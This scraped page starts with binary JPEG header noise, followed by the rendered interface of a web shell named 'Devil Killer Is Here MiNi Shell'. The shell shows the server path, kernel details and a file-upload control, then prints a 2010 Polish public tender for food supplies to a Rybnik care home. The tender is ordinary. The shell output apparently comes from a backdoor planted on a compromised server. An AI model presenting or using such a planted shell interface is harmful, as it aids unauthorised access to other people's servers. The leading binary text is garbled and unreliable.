JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100510/126674-N-2010.html

<p class="kh_header"><b>Rybnik: Sukcesywny zakup wraz z dostawą żywności dla Miejskiego Domu Pomocy Społecznej</b><br>
<b>Numer ogłoszenia: 126674 - 2010; data zamieszczenia: 10.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Dom Pomocy Społecznej , ul. Żużlowa 25, 44-200 Rybnik, woj. śląskie, tel. 0-32 4236075 w. 110, faks 0-32 4236075 w. 130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywny zakup wraz z dostawą żywności dla Miejskiego Domu Pomocy Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup zywnosci dla MDPS w Rybniku w podziale na zadania. Zadanie nr 1 - zakup wraz z dostawa mięsa i wyrobów mięsnych. Zadanie nr 2 - zakup drobiu. Zadanie nr 3 - zakup róznych produktów spożywczych. Zadanie nr 4 - zakup artykułów sypkich. Zadanie nr 5- zakup produktów mleczarskich. Zadanie nr 6 - zakup jaj. Szczegółowe okreslenie przedmiotu zamówienia zawiera SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.80.00.00-6, 15.60.00.00-4, 15.50.00.00-3, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny spełniania warunków udziału w postepowaniu na podstawie oswiadczeń i dokumentów, na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postepowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rybnik.pl/mdps<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Dom Pomocy Społecznej, ul. Żużlowa 25, 44-200 Rybnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2010 godzina 09:30, miejsce: Miejski Dom Pomocy Społecznej, ul. Żuzlowa 25 , 44-200 Rybnik, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup wraz z dostawą miesa i wyrobów mięsnych dla Miejskiego Domu Pomocy Społecznej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> miary	w dostawie 
 	 	 	rocznej
1	Baleron	kg	30
2	Boczek św.b/k 	kg	100
3	Boczek wędzony b/k	kg	350
4	Filet wędzony z indyka	kg	120
5	Frankfuterki	kg	100
6	Frankfuterki wędzone	kg	20
7	Kaszanka -krupniok	kg	200
8	Kiełbasa biała parzona	kg	40
9	Kiełbasa kminkowa	kg	130
10	Kiełbasa pieprzowa	kg	80
11	Kiełbasa krakowska	kg	50
12	Kiełbasa tostowa	kg	100
13	Kiełbasa żywiecka	kg	120
14	Mortadela	kg	300
15	Mielonka drobiowa	kg	180
16	Mielonka turystyczna	kg	220
17	Metka łososiowa	kg	80
18	Nóżki wieprzowe	kg	120
19	Parówkowa	kg	750
20	Pasztet drobiowy	kg	150
21	Polędwica drobiowa	kg	180
22	Polędwica sopocka	kg	60
23	Pieczeń rzymska	kg	120
24	Salceson z indyka	kg	80
25	Salceson ozorkowy	kg	80
26	Szynka cygańska	kg	90
27	Szynka pieczona	kg	80
28	Szynka prasowana	kg	100
29	Szynka dębicka	kg	80
30	Szynka tradycyjna wędzona	kg	80
31	Kiełbasa śląska drobiowa	kg	600
32	Kiełbasa śląska	kg	300
33	Wędzonka wiejska	kg	80
34	Wieprzowe gulaszowe	kg	350
35	Wieprzowe golonko	kg	120
36	Wieprzowy karczek b/k	kg	220
37	Wieprzowa łopatka b/k	kg	350
38	Wieprzowe ozory	kg	180
39	Wieprzowa słonina	kg	150
40	Wieprzowy schab b/k	kg	250
41	Wieprzowa szynka b/k	kg	300
42	Wieprzowa wątroba	kg	60
43	Wieprzowe żeberka płaty	kg	250
44	Wołowe gulaszowe	kg	250
45	Wołowe rosołowe	kg	80
46	Kości wędzone	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wraz z dostawą drobiu dla Miejskiego Domu Pomocy Społecznej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Wyszczególnienie towaru	Jedn.	zamówienia
 	 	miary	w dostawie 
 	 	 	rocznej
1	Ćwiartki tylne z kurczaka	kg	1600
2	Filet z indyka	kg	350
3	Filet z kurczaka	kg	400
4	Kurczak świeży	kg	1000
5	Porcja rosołowa z indyka	kg	350
6	Porcje rosołowe z kurczaka	kg	350
7	Skrzydła z indyka	kg	500
8	Wątroba z indyka	kg	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wraz z dostawą różnych produktów spozywczych dla Miejskiego Domu Pomocy Społecznej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Wyszczególnienie towaru	Jedn.	zamówienia
 	 	miary	w dostawie 
 	 	 	rocznej
1.	Aromat do ciasta migdałowy 10ml	szt	5
2.	Biszkopty  120g  b/c (skład: mąka pszenna, jaja świeże, cukier intertowany ,mąka ziemniaczana, emulgatory ,stabilizatory)	szt	260
3	Biszkopty z owocową galaretką oblane czekoladą 147g  (zawartość min.galaretki 53% w tym koncentrat owocowy 1,5% ,co najmniej 15% czekolada)	szt	150
4.	Budyń b/c 35g  różne smaki	szt	140
5.	Budyń z cukrem 60g różne smaki	szt	300
6.	Chrzan słoik 190g	szt	250
7.	Cukier waniliowy 32g	szt	180
8.	Cynamon 15g	szt	30
9.	Ciastka domowe kruche słodzone fruktozą  80g (skład: mąka pszenna, tłuszcz roślinny utwardzony, skrobia, substancje słodzące, masło, żółtko jaj w proszku, sól, substancje spulchniające, aromaty i barwniki	szt	400
10.	Czekolada pełnomleczna twarda 100g (skład: cukier, mleko pełne w proszku, miazga kakaowa, tłuszcz roślinny, serwatka, masa kakaowa w czekoladzie co najmniej 25%)	szt	900
11.	Czekolada bez cukru 80g (skład: substancje słodzące, mleko w proszku pełne, tłuszcz i miazga kakaowa ,emulgatory , aromaty, masa kakaowa min.36%)	szt	400
12.	Czosnek mielony 20g	szt	10
13.	Dżem niskosłodzony (co najmniej na 40g owoców/100g dżemu , 35g cukru /100g produktu) różne smaki 280g	szt	1000
14.	Dżem b/c -słodzony fruktozą (minimum 45g owoców /100g dżemu) słoik 220g -różne smaki	szt	600
15.	Deser dla dzieci (bez dodatku cukru, bezglutenowy, z wit.C) różne smaki 130g 	szt	400
16.	Fasolka szparagowa konserwowa 500g	szt	200
17.	Galaretka owocowa w proszku 79g różne smaki	szt	320
18.	Goździki 15g	szt	10
19.	Groszek konserwowy  400g	szt	280
20.	Herbata czarna ekspresowa (skład: mieszanka czarnych herbat) okrągłe torebki -100 sztuk	szt	730
21.	Herbata owocowa ekspresowa o smaku malinowym 20 torebek (Skład: owoc malinowy min.0,5%,kwiat hibiskusa, jabłko, owoc dzikiej róży aromaty owocu bzu czarnego)	szt	60
22.	Herbata ekspresowa z mięty 20 torebek (skład: liść mięty pieprzowej)	szt	36
23.	Kakao ciemne 200g	szt	50
24.	Kawa Inka 150g  skład: zboża min.72% ( jęczmień, żyto) ,cykoria, burak cukrowy prażony	szt	100
25.	Kawa naturalna 250g 	szt	372
26.	Kawa rozpuszczalna słoik 50g ( 100% kawy naturalnej)	szt	320
27.	Kawa zbożowa 500g	szt	50
28.	Ketchup łagodny - skład: pomidory(min.214g/100g ketchupu), sól, cukier, ocet, aromat naturalny, skrobia naturalna 480g	szt	72
29.	Kisiel b/c 38g	szt	90
30.	Kisiel z cukrem 77g	szt	400
31.	Gorczyca 15g	szt	10
32.	Kompot agrestowy 0,9l	szt	24
33.	Koncentrat barszczu z buraków ćwikłowych  380g (zagęszczony sok z buraków ćwikłowych ,sól, przyprawy aromatyczne, bez konserwantów)	szt	160
34.	Koncentrat pomidorowy 200g  (30% z świeżych pomidorów ,bez dodatków)	szt	72
35.	Koncentrat pomidorowy 1000g (30% z świeżych pomidorów ,bez dodatków) 	szt	176
36.	Krakersy 70g	szt	480
37.	Kukurydza konserwowa 400g 	szt	24
38.	Kwasek cytrynowy 50g	szt	75
39.	Liść laurowy 10g	szt	20
40.	Majeranek 10g	szt	150
41.	Majonez ( min. zawartość tłuszczu 80% )słoik 700ml	szt	120
42.	Mak- luz 	kg	10
43.	Mieszanka czekoladowa -różne smaki	kg	60
44.	Migdały płatki -luz	kg	7
45.	Miód wielokwiatowy naturalny słoik 400ml	szt	144
46.	Morele suszone- luz	kg	10
47.	Musztarda stołowa 200g	szt	450
48.	Napój niegazowany 2l	szt	42
49.	Ocet spirytusowy 10% 0,5l	szt	120
50.	Ogórki konserwowe  0,9l	szt	150
51.	Olej roślinny uniwersalny 0,5l	szt	80
52.	Olej roślinny uniwersalny  1l	szt	460
53.	Orzechy włoskie łuskane -luz	kg	7
54.	Owoce suszone -luz (jabłka, gruszki)	kg	20
55.	Papryka konserwowa 0,9l	szt	120
56.	Papryka mielona słodka 50g	szt	80
57.	Pasztet drobiowy 90g (skład: surowce drobiowe co najmniej 34%,woda, tłuszcz wieprzowy ,mąka pszenna, białko sojowe, sól, przyprawy, regulator kwasowości)	szt	1500
58.	Pasztet drobiowy 50g (skład: mięso z kurcząt min 39%, tłuszcz roślinny, wątroba z kurcząt, sól, mleko w proszku, białko sojowe, przyprawy)	szt	950
59.	Pieczarki marynowane 0,76ml	szt	32
60.	Pieprz mielony czarny 20g	szt	220
61.	Pierniczki nadziewane w czekoladzie 160g (nadzienie co najmniej 29%,czekolada min. 17%)	szt	150
62.	Podgrzybek suszony 40g	szt	100
63.	Powidła węgierkowe 300g (170g owoców /100g wyrobu , cukier 54g/100g powideł)	szt	72
64.	Przecier ogórkowy -słoik 280g (skład: ogórek kwaszony, przyprawy)	szt	124
65.	Proszek do pieczenia 36g	szt	100
66.	Przyprawa 1kg (skład: sól, warzywa suszone min.15,1%, substancje wzmacniające smak)	szt	40
67.	Przyprawa w płynie 1,04 litra (skład: woda, sól, substancje  wzmacniające smak i zapach, glutamin sodu, regulator kwasowości, kwas cytrynowy, barwniki, karmel amoniakalny, ekstrakt z lubczyka, aromat)	szt	140
68.	Rodzynki sułtańskie -luz	kg	10
69.	Słodzik niskokaloryczny w pudrze, nie zawierający sacharyny - słoik 150g	szt	20
70.	Sok 0,2l kartonik	szt	900
71.	Sok owocowo- warzywny przecierowy 300ml (skład: przecier warzywny i soki min.55%, woda, cukier, kwas cytrynowy, wzbogacony wit.C)	szt	900
72.	Sos do pieczeni ciemny 30g (skład: co najmniej 2,7% warzywa suszone, skrobia ziemniaczana i modyfikowana, mąka pszenna, aromaty, tłuszcze roślin utwardzonych, przyprawy, koncentrat pomidorowy suszony, mąka ryżowa)	szt	100
73.	Sos do spagetti 40g (min.40% suszonych pomidorów, co najmniej 9% koncentrat pomidorowy)	szt	120
74.	Sos grzybowy 30g (skład: min warzywa suszone,1,3% ,co najmniej 6,4 % grzyby suszone)	szt	40
75.	Sos sałatkowy 0,9g typu  różne smaki	szt	400
76.	Suchary b/c 285g	szt	300
77.	Syrop - wysokosłodzony , pasteryzowany, ekstrakt min.65% 430g (skład: min. sok zagęszczony  5%, woda, syrop glukozowo fruktozowy) 	szt	100
78.	Śliwka suszona kalifornijska - luz	szt	15
79.	Śliwka w syropie 900g	szt	50
80.	Kruchy wafelek z kremem kakaowym- min.49,7%  oblany czekoladą 52g  (min. 30,7% czekolada, zawartość masy kakaowej co najmniej  43%)	szt	1350
81.	Wafle bez dodatku cukru słodzone fruktozą 80g (skład: mąka pszenna, tłuszcz roślinny, utwardzony, mleko w proszku odtłuszczone, substancje słodzące, chrupki kukurydziane, skrobia ziemniaczana, lecytyna sojowa, sól, aromaty)	szt	500
82.	Woda mineralna gazowana 1,5l	szt	220
83.	Woda mineralna niegazowana 1,5l	szt	100
84.	Ziele angielskie 15g	szt	25
85.	Żelatyna 50g	szt	100
86.	Zaprawa cytrynowa 1L (skład: sok cytrynowy min. 40% z soku zagęszczonego kwasek cytrynowy, aromat naturalny, woda)	szt	80
87.	Gorczyca	szt	10
88.	Wafle - różne smaki 80g ( skład: mąka pszenna, tłuszcz roślinny utwardzony, cukier, serwatka w proszku, mleko w proszku, skrobia, olej roślinny, aromat smakowy, emulgatory, substancje spulchniające)	szt	1300
89.	Przyprawa do flaków 20g (skład: sól ,warzywa suszone, przyprawy, substancje wzmacniające smak i zapach)	szt	40
90.	Przyprawa do kurczaka 25g (skład: min. papryka ,majeranek, czosnek, curry, pieprz, liść laurowy, seler, tymianek, pietruszka liść, sól, cebula, mąka, olej roślinny)	szt	80
91.	Napój grejpfrutowo- pomarańczowy o obniżonej wartości energetycznej light, pasteryzowany, bez środków konserwujących, zawiera substancje słodzące 1 litr	szt	80
92.	Nektar wieloowocowy -zawartość owoców 40%,wyprodukowany z soków zagęszczonych pasteryzowany 1 litr	szt	240
93.	Sos sojowo-grzybowy 0,59l	szt	5
94.	Mus jabłko - brzoskwinia słoik 1 litr	szt	20
95.	Herbata czarna ekspresowa w torebkach ze sznurkiem 25 torebek	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup wraz z dostawą artykułów sypkich dla Miejskiego Domu pomocy Społecznej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> miary	w dostawie 
 	 	 	rocznej
1.	Cukier 1000g	kg	2300
2.	Cukier puder 500g	szt	6
3.	Kasza gryczana 1000g	kg	120
4.	Kasza Kus-kus 300g	szt	250
5.	Kasza manna 1000g	kg	300
6.	Kasza mazurska 1000g	kg	100
7.	Kaszka mleczno- ryżowa różne smaki 200g	szt	300
8.	Makaron - łazanki (skład: mąka pszenna makaronowa, woda źródlana, witamina A)	kg	80
9.	Makaron - muszla (skład: mąka pszenna makaronowa, woda źródlana, witamina A)	kg	100
10.	Makaron- kolanka (skład: mąka pszenna makaronowa, woda źródlana, witamina A)	kg	100
11.	Makaron -nitka (skład: mąka makaronowa, woda, 2 jajka /1kg mąki, betakaroten)	kg	200
12.	Makaron -świdry  (skład: mąka pszenna makaronowa, woda źródlana, witamina A)	kg	100
13.	Mąka na żurek 1000g	kg	15
14.	Mąka pszenna 1000g	kg	700
15.	Mąka tortowa 1000g	kg	50
16.	Mąka ziemniaczana 1000g	kg	70
17.	Płatki kukurydziane 500g	szt	200
18.	Płatki owsiane 500g	szt	200
19.	Płatki ryżowe 200g	szt	650
20.	Ryż 1000g	kg	350
21.	Sól 1000g	kg	400
22.	Zacierka makaronowa 250g(skład: mąka pszenna makaronowa, 2 jajka/1kg mąki, woda, kurkuma)	szt	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup w raz z dostawą produktów mleczarskich dla Miejskiego Domu Pomocy Społecznej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególinienie towaru      Jedn. miary      Ilość	 	               	 	 	             
1.	Jogurt owocowy 150g (skład min.:2% sok owocowy, mleko, śmietana, żelatyna, żywe kultury bakterii)	szt.	600
2.	Jogurt naturalny b/c 175g 2% tłuszczu	szt.	300
3.	Kefir 400 ml o zawartości tłuszczu 2%	szt.	400
4.	Masło  o zawartości min. 82% tłuszczu	szt.	12200
5.	Mleko folia 2% 0,9l	szt.	27375
6.	Maślanka naturalna karton 1 litr o zawartości tłuszczu 1,5%	szt.	1500
7.	Ser krążki (skład :co najmniej 27% tłuszczu, ser, masło, woda,l aktoza, białko mleka, sole emulgujące, sól, stabilizatory) 300g -różne smaki	szt.	600
8.	Ser domowy z kminkiem -płaty 2 kg 	kg	192
9.	Ser topiony w plastrach 150g (skład: ser 41%,mleko odtłuszczone, masło, mieszanka przypraw)	szt.	1400
10.	Ser topiony kremowy(skład: min .zawartość tłuszczu 29%,woda ,masło, ser, odtłuszczone mleko w proszku, sole emulgujące, regulator kwasowości ) -różne smaki krążki  200g	szt.	700
11.	Ser żółty zawartość tłuszczu 45%	kg.	450
12.	Serek homogenizowany (skład: twaróg odtłuszczony, mleko odtłuszczone, cukier, śmietanka ,bez konserwantów) 140g 	szt.	2150
